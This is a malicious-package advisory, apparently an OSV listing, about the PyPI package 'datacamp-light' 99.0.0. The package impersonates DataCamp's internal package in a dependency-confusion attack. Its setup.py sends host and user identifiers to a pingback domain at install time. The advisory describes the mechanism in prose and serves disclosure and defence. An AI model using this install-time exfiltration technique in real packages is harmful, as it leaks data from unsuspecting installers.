datacamp-light @99.0.0
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 4:30 AM UTC
OSV ID
MAL-2026-5868
Ecosystem
pypi
Summary
datacamp-light 99.0.0 impersonates DataCamp's internal package (name='datacamp-light', author='DataCamp', url='https://github.com/datacamp/datacamp-light', anomalous version 99.0.0 — the canonical dependency-confusion bait shape). setup.py defines an exfiltrate() function and invokes it unconditionally at top level, so it fires during pip install . The function collects hostname, current working directory, platform, Python version, and USER/USERNAME environment variables, JSON-encodes them, and POSTs them via urllib.request.urlopen to https://z39gspa3.pingback.sh/c. Any installer whose resolver picks up this public artifact (the intent of the 99.0.0 version pin) leaks host and user identifiers to the pingback domain. Even though the package self-labels as a 'PoC,' the published artifact actively phones home from any machine that installs it.
Source: amazon-inspector (234a0d37873455b7db32068745d93ed29aafa596877b39949280b4ec0621ad6b)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.